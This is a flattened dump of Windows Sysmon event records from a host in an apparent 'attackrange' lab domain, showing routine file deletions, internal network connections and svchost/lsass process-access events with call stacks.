AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED9CD5A65C7644380AFF8108568776A,SHA256=65E3849A8C8BD40ACAB280D653B4DAB60615D5598247FF182B5BB89DE3CAF83B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:00.270{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52420-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:00.104{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52419-false10.0.1.12-8000- 23542300x800000000000000035342366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:34.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AAE0D9F4F0BE7DAF8C67613C9728F875,SHA256=BDAE7ECBA41345B3203F15E9EB082456F1AFCFE7F342EC3EFA7F0B109A55DBC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:34.084{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5B352199B7AB125F1E963A85EE713A5,SHA256=189DBB17900B2066525F002D35A18859E7BF57888482CC8E8F653B98EE572654,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:35.983{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:35.983{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:35.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81D89CC63D38490D2F7B5391CCB6E16C,SHA256=A548D930D4D7E4187AC43C912F49804E7924D51E84C1588B2AD0DAD7AFF9FAF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.882{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF75f6d0d9.TMPMD5=04FF95A2FE228D7220768019181761C0,SHA256=2B77E179F0F857220403F313CBD0DBA32E5AA89FEB6AC4AC3F567CE355279CBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.835{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF75f6d0aa.TMPMD5=9454C3A56474BC790A290B427A98A14E,SHA256=3F7C1C65AAFD1795069C2FA92B80397994B797122ED551AE0B161007CA97A905,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.782{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF75f6d06c.TMPMD5=A3572C94BF0EA7A38089D98876331C7D,SHA256=AC8114CFEBD573E8974A361BD0FACA81AF71B2C658817009D3F2FD53C24D18C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.567{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75f6cfa1.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.420{B81B27B7-4012-611D-1400-00000000C801}8841372C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.304{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.303{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.303{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4012-611D-0A00-00000000C801}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.300{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.299{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.299{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.299{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.299{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.298{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.298{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.204{B81B27B7-4012-611D-1400-00000000C801}8841372C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0F00-00000000C801}924C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000035342396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:36.183{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 